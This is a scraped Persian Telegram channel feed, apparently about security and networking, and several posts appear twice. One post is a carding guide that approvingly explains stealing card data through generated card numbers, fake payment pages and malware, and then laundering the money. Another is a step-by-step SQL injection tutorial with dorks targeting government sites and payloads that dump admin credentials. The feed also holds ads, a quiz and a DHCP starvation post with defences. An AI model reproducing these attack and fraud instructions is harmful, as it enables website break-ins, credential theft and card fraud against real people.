| کانال امنیت و شبکه |
👇🏼💸معرفی کاردینگ و کاردر😅 👤 Drwcsi 💎 Channel: @DevelopixNetwork
🛑💸کاردینگ چیه و کاردر کیه؟!
🥷🏼کاردینگ یعنی دزدیدن اطلاعات کارتهای بانکی و شستشوی اونها.
و کاردر هم به کسی گفته میشه که مشغول به کاردینگه...
🔶خب بریم مفصل توضیحش بدیم.
گفتیم دزیدن اطلاعات کارتهای بانکی، پس لازمه اول راجع به کارتهای بانکی بین المللی اطلاعات بدست بیاریم.
کارتهای خارجی تایپ های مختلفی دارن که مزایا و معایبشو نوشتم:
💳مستر: مستر کارت یه کارت جهانیه با امنیت متوسط و ضمانت متوسط.
💳اکسپرسس: امنیت زیادی داره، ضماتت خیلی زیاد، خرید آسان اما کارتی کمیاب.
💳ویزا: ویزا کارت هم جهانیه ، امنیت پایینی داره و ضمانت کم.
[اینجا یه پرانتز باز میکنم و امنیت و ضمانت رو توضیح میدم، امنیت که مشخصه، یعنی هر چقدر امنیت بیشتر باشه، کارِ کاردر برای دزدیدن اطلاعات اون، سختتره.
و ضمانت یعنی در صورت رخ دادن همچین اتفاق هایی مثل کاردینگ، بانک گردن بگیرش بالاست یا نه😅 در واقع خسارت رو قبول میکنه یا نه؟ بعضی از بانکها بدون اینکه حتی کاربر متوجه بشه پول رو بازگشت میزنن و از جیب خودشون میدن اما بعضی بانک ها کاربرر رو مقصر میدونن، با این تفاسیر بهترین کارت اکسپرسس امریکا هستش]
🔶مبحث بعدی دبیت کارت و کردیت کارته
توی خیلی از کشورها، علیرغم ایران که فقط دبیت کارت داره، کردیت کارد دارن. یعنی چی؟ تو دبیت کارتها فقط میتونی به اندازه پولت خرج کنی ولی کردیت کارتا هر چقدر بخوای (تا سقفی که پیش اون بانک اعتبار داری) و به هر واحد پولی که بخوای، بانک برات حساب میکنه و تو اخر ماه باهاش صاف میکنی. (که خب اینجا معلوم میشه ک کردیت کارتها بیشتر مناسب کار مان😎 دزدی بدون محدودیت داریم اینجا😂)
🔶حالا خود این کردیت کارتها، که کارتهای مورد بحث ما هستن رو، میشه به دو نوع ازشون سو استفاده کرد :
1️⃣تولید کارتای جعلی با حد کم که معمولا با باگ گرفتن از درگاه های بانکی انجام میشه، مثلا بعضی درگاها رنج دادن که از ۱۲۳۴ تا ۲۲۳۴ رنج بین ترکیه است و نفوذگر هم میزنه جنریت میکنه و از اعتبار کلی کارت که اصلا وجود ندارن استفاده میشه 😄 اما خب معمولا اعتبارشون رو کمترین حالته. توضیحات کاملتر این روش رو تو این پست میتونید بخونید.
2️⃣روش بعدی جعلِ کارتهای واقعی هستش که اینجا معمولا اعتبار کاربرها بالاست و این یعنی میتونید خرید تپل بزنید 🫣🛒این جعل کارتهای واقعی با روش های مختلفی انجام پذیره که یکیشم فیشینگ یا همون جعل درگاه پرداخت هستش، یعنی شما میاید یه صفحه ای شبیه صفحه ی پرداختهای معتبر میسازید و به روشی، کاربر رو هدایت میکنید به اون صفحه، کاربرم که از همه جا غافل میاد از درگاه استفاده بکنه و اطلاعات کارت بانکیشو وارد میکنه و برای شما ارسال میشه :) ، روش دیگه اش دادن ویروس به کاربر و بعد نفوذ به کیف پولهاش و دریافت اطلاعات کارت بانکیشه ، روش دیگه هک سایتهای مرجع و بانکهاست که دیگه اون خیلی سطحش بالاست و به ما نمیخوره😅 ولی در اون حالت همه چیز تو مشتتونه و یه سرقت بزرگ 🙃👊🏻 و روشهای دیگه...
🔶خب ما تا اینجا کارتهارو شناختیم و فهمیدیم چجوری میشه اطلاعاتشون رو دریافت کرد
حالا میخوایم ببینیم بعد اینکه اطلاعاتشو دریافت کردیم چیکار میتونیم باهاش بکنیم؟
اینجاست که بحث پولشویی یا همون تبدیل پولایی که از راه خلاف بدست میاد به پول مشروع وسط میاد.
که اینم روشای مختلفی داره:
💵فروش اطلاعات کارت به افرادی که تو این حوزه فعالن
💵خرید زدن از سایتهای بین الملل مثل امازون یا خرید اکانت و نرم افزار و ... و بعد فروختن اونها به افرادی که خریدارن
💵خرید ارزهای دیجیتال
و ...
🔶بطور خلاصه کاردینگ به هر گونه دزدی از حساب های بانکی به هر روشی از جمله فیشینگ و ... گفته میشه و دنیای خیلی بزرگ و گسترده ای داره که سعی کردم تو این مطلب از سیر تا پیازش رو بگم امیدوارم مفید واقع شده باشه🧅😄
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🥷🏼کاردینگ یعنی دزدیدن اطلاعات کارتهای بانکی و شستشوی اونها.
و کاردر هم به کسی گفته میشه که مشغول به کاردینگه...
🔶خب بریم مفصل توضیحش بدیم.
گفتیم دزیدن اطلاعات کارتهای بانکی، پس لازمه اول راجع به کارتهای بانکی بین المللی اطلاعات بدست بیاریم.
کارتهای خارجی تایپ های مختلفی دارن که مزایا و معایبشو نوشتم:
💳مستر: مستر کارت یه کارت جهانیه با امنیت متوسط و ضمانت متوسط.
💳اکسپرسس: امنیت زیادی داره، ضماتت خیلی زیاد، خرید آسان اما کارتی کمیاب.
💳ویزا: ویزا کارت هم جهانیه ، امنیت پایینی داره و ضمانت کم.
[اینجا یه پرانتز باز میکنم و امنیت و ضمانت رو توضیح میدم، امنیت که مشخصه، یعنی هر چقدر امنیت بیشتر باشه، کارِ کاردر برای دزدیدن اطلاعات اون، سختتره.
و ضمانت یعنی در صورت رخ دادن همچین اتفاق هایی مثل کاردینگ، بانک گردن بگیرش بالاست یا نه😅 در واقع خسارت رو قبول میکنه یا نه؟ بعضی از بانکها بدون اینکه حتی کاربر متوجه بشه پول رو بازگشت میزنن و از جیب خودشون میدن اما بعضی بانک ها کاربرر رو مقصر میدونن، با این تفاسیر بهترین کارت اکسپرسس امریکا هستش]
🔶مبحث بعدی دبیت کارت و کردیت کارته
توی خیلی از کشورها، علیرغم ایران که فقط دبیت کارت داره، کردیت کارد دارن. یعنی چی؟ تو دبیت کارتها فقط میتونی به اندازه پولت خرج کنی ولی کردیت کارتا هر چقدر بخوای (تا سقفی که پیش اون بانک اعتبار داری) و به هر واحد پولی که بخوای، بانک برات حساب میکنه و تو اخر ماه باهاش صاف میکنی. (که خب اینجا معلوم میشه ک کردیت کارتها بیشتر مناسب کار مان😎 دزدی بدون محدودیت داریم اینجا😂)
🔶حالا خود این کردیت کارتها، که کارتهای مورد بحث ما هستن رو، میشه به دو نوع ازشون سو استفاده کرد :
1️⃣تولید کارتای جعلی با حد کم که معمولا با باگ گرفتن از درگاه های بانکی انجام میشه، مثلا بعضی درگاها رنج دادن که از ۱۲۳۴ تا ۲۲۳۴ رنج بین ترکیه است و نفوذگر هم میزنه جنریت میکنه و از اعتبار کلی کارت که اصلا وجود ندارن استفاده میشه 😄 اما خب معمولا اعتبارشون رو کمترین حالته. توضیحات کاملتر این روش رو تو این پست میتونید بخونید.
2️⃣روش بعدی جعلِ کارتهای واقعی هستش که اینجا معمولا اعتبار کاربرها بالاست و این یعنی میتونید خرید تپل بزنید 🫣🛒این جعل کارتهای واقعی با روش های مختلفی انجام پذیره که یکیشم فیشینگ یا همون جعل درگاه پرداخت هستش، یعنی شما میاید یه صفحه ای شبیه صفحه ی پرداختهای معتبر میسازید و به روشی، کاربر رو هدایت میکنید به اون صفحه، کاربرم که از همه جا غافل میاد از درگاه استفاده بکنه و اطلاعات کارت بانکیشو وارد میکنه و برای شما ارسال میشه :) ، روش دیگه اش دادن ویروس به کاربر و بعد نفوذ به کیف پولهاش و دریافت اطلاعات کارت بانکیشه ، روش دیگه هک سایتهای مرجع و بانکهاست که دیگه اون خیلی سطحش بالاست و به ما نمیخوره😅 ولی در اون حالت همه چیز تو مشتتونه و یه سرقت بزرگ 🙃👊🏻 و روشهای دیگه...
🔶خب ما تا اینجا کارتهارو شناختیم و فهمیدیم چجوری میشه اطلاعاتشون رو دریافت کرد
حالا میخوایم ببینیم بعد اینکه اطلاعاتشو دریافت کردیم چیکار میتونیم باهاش بکنیم؟
اینجاست که بحث پولشویی یا همون تبدیل پولایی که از راه خلاف بدست میاد به پول مشروع وسط میاد.
که اینم روشای مختلفی داره:
💵فروش اطلاعات کارت به افرادی که تو این حوزه فعالن
💵خرید زدن از سایتهای بین الملل مثل امازون یا خرید اکانت و نرم افزار و ... و بعد فروختن اونها به افرادی که خریدارن
💵خرید ارزهای دیجیتال
و ...
🔶بطور خلاصه کاردینگ به هر گونه دزدی از حساب های بانکی به هر روشی از جمله فیشینگ و ... گفته میشه و دنیای خیلی بزرگ و گسترده ای داره که سعی کردم تو این مطلب از سیر تا پیازش رو بگم امیدوارم مفید واقع شده باشه🧅😄
👤 Drwcsi
💎 Channel: @DevelopixNetwork
👍16🔥1
😎🔥اموزش نفوذ به وبسایت ها
📌خب شاید بگید چه تیتر کلیشه ای و تکراری ای ! چون احتمالا بارها به گوشتون خورده ولی جز تبلیغ چنل اصغر هک ، چیز دیگه ای دستگیرتون نشده😅. ولی خب باید بگم این کار غیر ممکن نیست و با پیدا کردن آسیب پذیری ها میشه انجامش داد 🙃
📌یکی از این آسیب پذیری ها ، SQL injection یا تزریق SQL هستش💉.
🔹یه توضیح اجمالی درباره SQL بدم و بریم سراغ اصل مطلب.
خب همونطور که خیلیاتون میدونید، SQL یه زبان برنامه نویسی برای ایجاد و مدیریت پایگاه های داده یا دیتابیس ها هستش، یعنی چی؟! یعنی میشه گفت تقریبا تمام اطلاعات سایت ها به روی یه بستری حفظ و نگهداری میشن و داخل اون طبقه بندی میشن که به اون بسترها پایگاه داده میگن. مثل چه اطلاعاتی؟! اطلاعات هویتی کاربران سایت، اطلاعات لاگین به سایت ادمین ها و یوزر ها، اطلاعات محصولات و ... .
🔹خب چی گفتم؟ اطلاعات لاگین ادمین ها 🙄🦷 وقت دندون تیز کردنه ؛ چرا که با بدست آوردن اطلاعات لاگین ادمین در واقع مدیریت کل سایت رو بدست میگیریم و همه چی تمومه😁...
📌خب بریم سراغ اصل مطلب یا همون پیاده سازیش😎
1️⃣مرحله اول پیاده سازی اینه که پیدا کنیم چه سایتهایی این آسیب پذیری رو دارن؟!
🔹ما میتونیم با کمک دورک نویسی این سایتهارو پیدا کنیم[اگه نمیدونی دورک چیه تو پستهای قبلی توضیحش دادم حتما بخون]؛ چندتا دورک پیشنهادی براتون مینویسم ولی در نهایت خودتون هم میتونید با سرچ کردن دورک های اماده ی مخصوص این اسیب پذیری رو پیدا کنید و تو طیف گسترده تری جستجوتون رو انجام بدین👌🏼🔎
🔻
🔹اگه دنبال گاورمنت ها نیستید میتونید پسوند های دیگه ای رو جستجو کنید برای مثال شرکت های تجاری (.com) یا بیزینس ها (.biz) یا شرکت های اطلاع رسانی (.info) و غیره رو برای کشورهای مختلف دیگه ای خارج از موارد بالا مثل کانادا (.ca) یا امارات (.ae) یا کلمبیا (.co) و ... استفاده کنید.
2️⃣تو مرحله دوم باید صفحات وبسایت مورد نظر رو تست کنیم که ببینیم کدوم صفحه باگ رو داره.
برای اینکار باید url اش رو دستکاری کنیم که اینکار خودش دوتا روش داره :
روش اول -> قرار دادن سینگل کوتیشن اخر ادرس سایت ؛ مثل:
در این حالت اگه سایت لود بشه که یعنی آسیب پذیر نیست ولی اگه آسیب پذیر باشه شمارو به صفحه ای با ادرس warning:mysqlfetcharray() منتقل کرد یعنی حاوی آسیب پذیریه و میتونیم کارمونو شروع کنیم 😎
و روش دوم -> استفاده از کلمه اند؛ مثل :
در این حالت سایت باید ناقص لود بشه و یا لود نشه تا متوجه بشیم آسیب پذیره، در غیر اینصورت آسیب پذیر نیست.
مابقی مراحل رو تو پست بعدی دنبال کنید 👀👇🏼
👤 Drwcsi
💎 Channel: @DevelopixNetwork
📌خب شاید بگید چه تیتر کلیشه ای و تکراری ای ! چون احتمالا بارها به گوشتون خورده ولی جز تبلیغ چنل اصغر هک ، چیز دیگه ای دستگیرتون نشده😅. ولی خب باید بگم این کار غیر ممکن نیست و با پیدا کردن آسیب پذیری ها میشه انجامش داد 🙃
📌یکی از این آسیب پذیری ها ، SQL injection یا تزریق SQL هستش💉.
🔹یه توضیح اجمالی درباره SQL بدم و بریم سراغ اصل مطلب.
خب همونطور که خیلیاتون میدونید، SQL یه زبان برنامه نویسی برای ایجاد و مدیریت پایگاه های داده یا دیتابیس ها هستش، یعنی چی؟! یعنی میشه گفت تقریبا تمام اطلاعات سایت ها به روی یه بستری حفظ و نگهداری میشن و داخل اون طبقه بندی میشن که به اون بسترها پایگاه داده میگن. مثل چه اطلاعاتی؟! اطلاعات هویتی کاربران سایت، اطلاعات لاگین به سایت ادمین ها و یوزر ها، اطلاعات محصولات و ... .
🔹خب چی گفتم؟ اطلاعات لاگین ادمین ها 🙄🦷 وقت دندون تیز کردنه ؛ چرا که با بدست آوردن اطلاعات لاگین ادمین در واقع مدیریت کل سایت رو بدست میگیریم و همه چی تمومه😁...
📌خب بریم سراغ اصل مطلب یا همون پیاده سازیش😎
1️⃣مرحله اول پیاده سازی اینه که پیدا کنیم چه سایتهایی این آسیب پذیری رو دارن؟!
🔹ما میتونیم با کمک دورک نویسی این سایتهارو پیدا کنیم[اگه نمیدونی دورک چیه تو پستهای قبلی توضیحش دادم حتما بخون]؛ چندتا دورک پیشنهادی براتون مینویسم ولی در نهایت خودتون هم میتونید با سرچ کردن دورک های اماده ی مخصوص این اسیب پذیری رو پیدا کنید و تو طیف گسترده تری جستجوتون رو انجام بدین👌🏼🔎
🔻
us
site:.gov.uk inurl:id
site:.gov.us inurl:id
🔻german
site:.gov.de inurl:id
🔻chin
site:.gov.cn inurl:id
🔹مثلا تو موارد بالا میایم گاورمنت هایی که مربوط به امریکا و یا المان و یا چین هستن و توی url شون کلمه id وجود داره رو جستجو میکنیم(وجود کلمه ایدی میتونه یکی از نشونه های این آسیب پذیری باشه)🔹اگه دنبال گاورمنت ها نیستید میتونید پسوند های دیگه ای رو جستجو کنید برای مثال شرکت های تجاری (.com) یا بیزینس ها (.biz) یا شرکت های اطلاع رسانی (.info) و غیره رو برای کشورهای مختلف دیگه ای خارج از موارد بالا مثل کانادا (.ca) یا امارات (.ae) یا کلمبیا (.co) و ... استفاده کنید.
2️⃣تو مرحله دوم باید صفحات وبسایت مورد نظر رو تست کنیم که ببینیم کدوم صفحه باگ رو داره.
برای اینکار باید url اش رو دستکاری کنیم که اینکار خودش دوتا روش داره :
روش اول -> قرار دادن سینگل کوتیشن اخر ادرس سایت ؛ مثل:
example.com/?page_id=16'در این حالت اگه سایت لود بشه که یعنی آسیب پذیر نیست ولی اگه آسیب پذیر باشه شمارو به صفحه ای با ادرس warning:mysqlfetcharray() منتقل کرد یعنی حاوی آسیب پذیریه و میتونیم کارمونو شروع کنیم 😎
و روش دوم -> استفاده از کلمه اند؛ مثل :
example.com/?page_id=16+and+1=0در این حالت سایت باید ناقص لود بشه و یا لود نشه تا متوجه بشیم آسیب پذیره، در غیر اینصورت آسیب پذیر نیست.
مابقی مراحل رو تو پست بعدی دنبال کنید 👀👇🏼
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔥8👍3
3️⃣خب بعد از اینکه تارگتمون رو پیدا کردیم، تو مرحله سوم میخوایم تعداد ستونهای جدول های دیتابیس رو پیدا کنیم که با دستور order by انجام میگیره، که به شکل زیر استفاده میشه :
تو اینجا دو تا عدد وجود داره عدد ۹۹۹ تعداد جدولهاست که ما اون رو ماکسیمم ترین حالت در نظر میگیریم تا کد بتونه اجرا بشه و عدد ۵ تعداد ستون ها ؛ ما باید تعداد ستونهارو از یه عدد بزرگ شروع کنیم و در صورت دریافت خطا متوجه بشیم که تعداد ستونها کمتره و انقدر پیش بریم و عدد رو کوچیک کنیم و تست کنیم تا دیگه خطا دریافت نکنیم و در واقع تعداد ستونها رو بدست بیاریم 🙂✔️
4️⃣ تو مرحله قبل تعداد کلی ستون هارو بدست اوردیم اما الان میخوایم تعداد ستون های آسیب پذیر رو به کمک دستور union select بدست بیاریم؛ به این صورت که :
خروجی این کد به شما اعدادی رو نشون میده مثل ۱-۲-۴ که نشون دهندهٔ ستون های آسیب پذیره.
5️⃣ تو گام پنجم میریم سراغ مهم ترین مسئله یا همون بیرون کشیدن جدول ادمین 👩🏼💻که از طریق information_schema انجام میشه.
خب به چه صورت؟!
اسم هایی که معمولا روی جدول ادمین قرار داده میشن موارد زیر هستن :
User,users,admin,login,username,usr,_user,tbladmin,tbluser,tblusers
6️⃣ خب خب ، نوبیتم باشه نوبت فراخوانی جدول ادمین با کمک دستور where هست؛
7️⃣در گام نهایی باید اطلاعات لاگین رو از جدول ادمین استخراج کنیم که به این شکل انجام میشه:
اگه نکتهی تکمیل کننده یا موردی هست کامنت کنید...
👤 Drwcsi
💎 Channel: @DevelopixNetwork
http://example.com/test.php?id=-999+order+by+5--تو اینجا دو تا عدد وجود داره عدد ۹۹۹ تعداد جدولهاست که ما اون رو ماکسیمم ترین حالت در نظر میگیریم تا کد بتونه اجرا بشه و عدد ۵ تعداد ستون ها ؛ ما باید تعداد ستونهارو از یه عدد بزرگ شروع کنیم و در صورت دریافت خطا متوجه بشیم که تعداد ستونها کمتره و انقدر پیش بریم و عدد رو کوچیک کنیم و تست کنیم تا دیگه خطا دریافت نکنیم و در واقع تعداد ستونها رو بدست بیاریم 🙂✔️
4️⃣ تو مرحله قبل تعداد کلی ستون هارو بدست اوردیم اما الان میخوایم تعداد ستون های آسیب پذیر رو به کمک دستور union select بدست بیاریم؛ به این صورت که :
http://example.com/test.php?id=5+union+select+1+2+3+4+5--
در واقع وقتی فهمیدیم جدولمون ۵ ستون داره ، جلوی آیدی ۵ رو قرار دادیم و به تعداد ستون هاش در اخر url عدد اضافه کردیم تا بتونیم از بین این ۵ ستون، ستونهای آسیب پذیر رو پیدا بکنیم. خروجی این کد به شما اعدادی رو نشون میده مثل ۱-۲-۴ که نشون دهندهٔ ستون های آسیب پذیره.
5️⃣ تو گام پنجم میریم سراغ مهم ترین مسئله یا همون بیرون کشیدن جدول ادمین 👩🏼💻که از طریق information_schema انجام میشه.
خب به چه صورت؟!
http://www.example.com/test.php?id=5+union+select+1,group_concat(table_name),3
,4,5+from+information_schema.tables--
خب اینجا گفتیم بیاد و جدولهای دیتابیس رو که به کمک group concat مرتب و گروه بندی شده رو بهمون نمایش بده ؛ که اون هم بچه حرف گوش کنیه 🦻🏼 و بهمون اسم جدول هارو نمایش میده. خب حالا وقتشه که از بین جدولها دنبال جدول ادمین بگردیم 👀😅اسم هایی که معمولا روی جدول ادمین قرار داده میشن موارد زیر هستن :
User,users,admin,login,username,usr,_user,tbladmin,tbluser,tblusers
6️⃣ خب خب ، نوبیتم باشه نوبت فراخوانی جدول ادمین با کمک دستور where هست؛
www.example.com/test.php?id=5+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name='admin'
حالا اطلاعات داخل جدول ادمین نمایش داده میشه .7️⃣در گام نهایی باید اطلاعات لاگین رو از جدول ادمین استخراج کنیم که به این شکل انجام میشه:
www.example.com/test.php?id=5+union+select+1,2,group_concat(username,0x3a,password),4,5+from+admin
الان اطلاعات لاگین به شکل admin:Act3ey67c به نمایش در میان و شما تونستید رمز ورود به پنل ادمین سایت رو بدست بیارید 💪🏼😅 و الان به تمام سایت دسترسی دارین :)😎💜اگه نکتهی تکمیل کننده یا موردی هست کامنت کنید...
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔥7👍3
Forwarded from Zi. Ta
https://www.instagram.com/reel/Cud-Z5StHG4/?igshid=MmU2YjMzNjRlOQ==
🔹️ اگر در عنوان های زیر مشغول به کار هستید ،یا میخواهید در این زمینه ها پیشرفت کنید ، این پیج درحال برگزاری دوره و آموزش های بسیار خوبی هست که خیلی به دردتون میخوره :
🔺️مدیران شبکه، زیرساخت و لینوکس
🔺️ متخصصان مانیتورینگ
🔺️ متخصصان DevOps
🔺️ متخصصان تحلیل داده
🔹️ اگر در عنوان های زیر مشغول به کار هستید ،یا میخواهید در این زمینه ها پیشرفت کنید ، این پیج درحال برگزاری دوره و آموزش های بسیار خوبی هست که خیلی به دردتون میخوره :
🔺️مدیران شبکه، زیرساخت و لینوکس
🔺️ متخصصان مانیتورینگ
🔺️ متخصصان DevOps
🔺️ متخصصان تحلیل داده
👍2
Forwarded from Developix Support
📌 اگر دنبال تبدیل شدن به یک برنامهنویس مطرح در دنیای فریلنسری و کسب درآمد بیشتر هستی، شرکت در این کارگاه رو از دست نده!
💻 کارگاه تجارت بینالمللی برای برنامهنویسها؛
(فریلنسرینگ حرفهای در مقیاس جهانی)
🗓 زمان: 30 شهریور تا 6 مهر 1402
حضوری و آنلاین (2 جلسه حضوری و 5 جلسۀ آنلاین)
📝 اطلاعات بیشتر و ثبتنام
🔻و یا برای کسب اطلاعات بیشتر کافیه به آیدی ما پیام بدی!
🆔 @MaktabSharif_Admin
🌐 وبسایت |📱کانال تلگرام | 📲 اینستاگرام
💻 کارگاه تجارت بینالمللی برای برنامهنویسها؛
(فریلنسرینگ حرفهای در مقیاس جهانی)
🗓 زمان: 30 شهریور تا 6 مهر 1402
حضوری و آنلاین (2 جلسه حضوری و 5 جلسۀ آنلاین)
📝 اطلاعات بیشتر و ثبتنام
🔻و یا برای کسب اطلاعات بیشتر کافیه به آیدی ما پیام بدی!
🆔 @MaktabSharif_Admin
🌐 وبسایت |📱کانال تلگرام | 📲 اینستاگرام
👎3
Forwarded from کار و کسب، عادل طالبی 📌
This media is not supported in your browser
VIEW IN TELEGRAM
📌 دوره آنلاین سئو برای مدیران، آخرین روز ثبتنام با تخفیف ویژه
🔘 استراتژی سئو
🔘 مدیریت فرآیندهای سئو
🔘 گزارشات سئو
🔘 ارزیابی و نظارت بر فرآیندهای سئو
🔘 اشتباهات سئو
🔘 قراردادهای سئو
این دوره پس از سه سال مجدداً برگزار میشود. در این دوره یاد میگیرید چگونه فرآیندهای سئو را مدیریت کنید. این دوره برای مدیران و صاحبان کسب و کارها مفید است که بدانند از تیم سئو چه بخواهند و چگونه از اجرای صحیح فرایندهای سئو اطمینان یابند. همچنین متخصصین سئو یاد میگیرند چگونه با کارفرمایان به شکل درست تعامل و همکاری کرده، به نیازهای آنها پاسخ صحیح بدهند.
پنج جلسه آموزش انلاین فشرده و تخصصی همراه با یک جلسه پرسش و پاسخ.
اطلاعات بیشتر و ثبتنام در ایسمینار:
🌐 eseminar.tv/wb116105
کد تخفیف: talebi
فقط امروز و فردا، به جای 5 میلیون تومان فقط با 2 میلیون تومان در این دوره آنلاین شرکت کنید.
هدایای شرکت در دوره:
🔘 حداقل 2 میلیون تومان رپورتاژ در تریبون
🔘 اکانت 6 ماهه جتسئو به ارزش 1.200.000 تومان
🔘 اکانت یک سالۀ سازمانی میزیتو به ارزش 2.900.000 تومان
🔘 یک جلد کتاب سئو 2022+2023 امضاء شده.
❌❌ فقط امروز ❌❌
☑️ @kar_kasb
🔘 استراتژی سئو
🔘 مدیریت فرآیندهای سئو
🔘 گزارشات سئو
🔘 ارزیابی و نظارت بر فرآیندهای سئو
🔘 اشتباهات سئو
🔘 قراردادهای سئو
این دوره پس از سه سال مجدداً برگزار میشود. در این دوره یاد میگیرید چگونه فرآیندهای سئو را مدیریت کنید. این دوره برای مدیران و صاحبان کسب و کارها مفید است که بدانند از تیم سئو چه بخواهند و چگونه از اجرای صحیح فرایندهای سئو اطمینان یابند. همچنین متخصصین سئو یاد میگیرند چگونه با کارفرمایان به شکل درست تعامل و همکاری کرده، به نیازهای آنها پاسخ صحیح بدهند.
پنج جلسه آموزش انلاین فشرده و تخصصی همراه با یک جلسه پرسش و پاسخ.
اطلاعات بیشتر و ثبتنام در ایسمینار:
🌐 eseminar.tv/wb116105
کد تخفیف: talebi
فقط امروز و فردا، به جای 5 میلیون تومان فقط با 2 میلیون تومان در این دوره آنلاین شرکت کنید.
هدایای شرکت در دوره:
🔘 حداقل 2 میلیون تومان رپورتاژ در تریبون
🔘 اکانت 6 ماهه جتسئو به ارزش 1.200.000 تومان
🔘 اکانت یک سالۀ سازمانی میزیتو به ارزش 2.900.000 تومان
🔘 یک جلد کتاب سئو 2022+2023 امضاء شده.
❌❌ فقط امروز ❌❌
☑️ @kar_kasb
Forwarded from Developix Support
This media is not supported in your browser
VIEW IN TELEGRAM
دایناسورها در حال خرید در تهران 🤯
⚡️هیچوقت فکرشو میکردی که همچین تصویری رو ببینی؟
⚡️از آینده به تو سلام 😁
💠این تصویر با استفاده از یک ابزار جدید در تلگرام ساخته شده که هر متنی بهش بدی رو تبدیل به عکس میکنه!
همینالان بهش پبام بده تا عکسش رو برات بفرسته😇
فقط کافیه بزنی رو آیدی زیر و شروع کنی 😉👇🏻
@aiolearn_artbot
🌀هوشمصنوعی با پیشرفت فوقالعادش داره همه دنیار رو فرا میگیره 😉🤯
⚡️هیچوقت فکرشو میکردی که همچین تصویری رو ببینی؟
⚡️از آینده به تو سلام 😁
💠این تصویر با استفاده از یک ابزار جدید در تلگرام ساخته شده که هر متنی بهش بدی رو تبدیل به عکس میکنه!
همینالان بهش پبام بده تا عکسش رو برات بفرسته😇
فقط کافیه بزنی رو آیدی زیر و شروع کنی 😉👇🏻
@aiolearn_artbot
🌀هوشمصنوعی با پیشرفت فوقالعادش داره همه دنیار رو فرا میگیره 😉🤯
👎11
...... برای جلوگیری از Loop لایه ۳ و ...... برای جلوگیری از Loop لایه ۲ می باشد. (از چپ به راست)
Anonymous Quiz
28%
Loopback - STP
43%
TTL - STP
17%
RSTP - PVSTP
11%
VLAN - Broadcast Storm
👍10🔥5
💒 دورا رو یادتونه؟! حالا قراره با کمک دورا بریم یه اتک بزنیم 😅
🔸 همونطور که میدونید هر دستگاهی که میخواد به اینترنت متصل بشه نیاز به آیپی داره، که ما گاهاً دستی اختصاصش میدیم و اکثر مواقع مخصوصاً در شبکههای بزرگ از DHCP که بطور اتومات فرآیند آیپی دهی رو انجام میده کمک میگیریم.
🔹 حالا دورا تو شبکه چیه؟
- فرآیند آیپی دهی توسط DHCP چهار مرحله داره که به اونها DORA گفته میشه، که مخفف Discovery , Offer , Request و Acknowledgement هستش.
— که بریم دونه دونه توضیحشون بدیم 😅
🔸 دیسکاوری چیه؟! اول ماجرا کلاینت یه بسته رو به کل شبکه میفرسته (برادکست میکنه) و میگه DHCP Server کیه؟! بیاد آیپی منو بده 😂😭
🔹 حالا آفر چیه؟ اینجاست که بستهای که برادکست شده و به همه ارسال شده یه نسخش میرسه دست DHCP Server و اونم میخواد اعلام کنه که بستت به دستم رسید و فهمیدم که آیپی میخوای. پس یه آیپی رو از تو Pool اش یا مخزن آیپیهاش برمیداره و برای این کلاینت رزرو میکنه و در جواب بسته دیسکاوری، بسته آفر رو با محتویاتِ: آیپیای که میخواد بهش پیشنهاد بده، مک کلاینت، مدت زمان رزرو آیپی، دیفالت گیت وی و دیاناس و سایر اطلاعات مورد نیاز کلاینت ارسال میکنه.
🔸 بستهی بعدی ریکوئسته که کلاینت میگه من این آیپیای که بهم پیشنهاد دادی توی آفر رو پسندیدم😅 و میخوامش. بهم اختصاص بده...
🔹 بستهی بعدی اکنالج هستش که تو این مرحله فرآیند آیپی دهی نهایی میشه و مواردی که تو مرحله آفر پیشنهاد داده بود رو نهایی میکنه و به کلاینت اختصاص میده.
🔸 خب میرسیم به جای جذابش که حالا ما چطوری از طریق دورا اتک میزنیم؟! 😎
- در اینجا اتکر میاد مک آدرس جعلی تولید میکنه و با هر کدوم از مکها یه بستهی دیسکاوری میفرسته و میگه به من آیپی بده، DHCP Server هم از Pool اش یا مخزن آیپیش دونه دونه آیپیهارو به مکهای جعلی اختصاص میده تا اینکه مخزنش خالی میشه و دیگه نمیتونه به دستگاههای واقعی شبکه آیپی اختصاص بده و اینجوری ارتباط کل دستگاههای موجود تو شبکه با همدیگه قطع میشه :)
- به این حمله DHCP Starvation گفته میشه. که در واقع مخزنمون خالی شده و گرسنش شده 🍔
🔹 حالا شاید سوال پیش بیاد راه حل جلوگیری ازش چیه؟!
- اگر درخواست آیپی با یک مکآدرس ثابت بود، باید با استفاده از تکنولوژی DHCP Snooping فیلتر MAC Address Check رو فعال کرد که در این حالت مکآدرس رو از هدر بسته میخونه و اگه تو زمان مشخص درخواست زیادی داد دراپش میکنه.
ولی اگه درخواست آیپی با مکهای مختلف اتفاق بیفته دیگه این راه حل جواب نمیده و میتونیم از یه مرحله قبل جلوشو بگیریم و Port Security رو فعال کنیم و بگیم فقط فلان مکآدرس امکان ارسال پکت از فلان پورت رو داره. و اینجوری اصلاً دستگاه دیگهای نمیتونه درخواست دیسکاوری بفرسته چه برسه که بخواد دریافت بشه و مکش چک بشه!
- و به همین راحتی مشکل حل میشه 😅
امیدوارم از این پست خوشتون اومده باشه 💜🧸
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔸 همونطور که میدونید هر دستگاهی که میخواد به اینترنت متصل بشه نیاز به آیپی داره، که ما گاهاً دستی اختصاصش میدیم و اکثر مواقع مخصوصاً در شبکههای بزرگ از DHCP که بطور اتومات فرآیند آیپی دهی رو انجام میده کمک میگیریم.
🔹 حالا دورا تو شبکه چیه؟
- فرآیند آیپی دهی توسط DHCP چهار مرحله داره که به اونها DORA گفته میشه، که مخفف Discovery , Offer , Request و Acknowledgement هستش.
— که بریم دونه دونه توضیحشون بدیم 😅
🔸 دیسکاوری چیه؟! اول ماجرا کلاینت یه بسته رو به کل شبکه میفرسته (برادکست میکنه) و میگه DHCP Server کیه؟! بیاد آیپی منو بده 😂😭
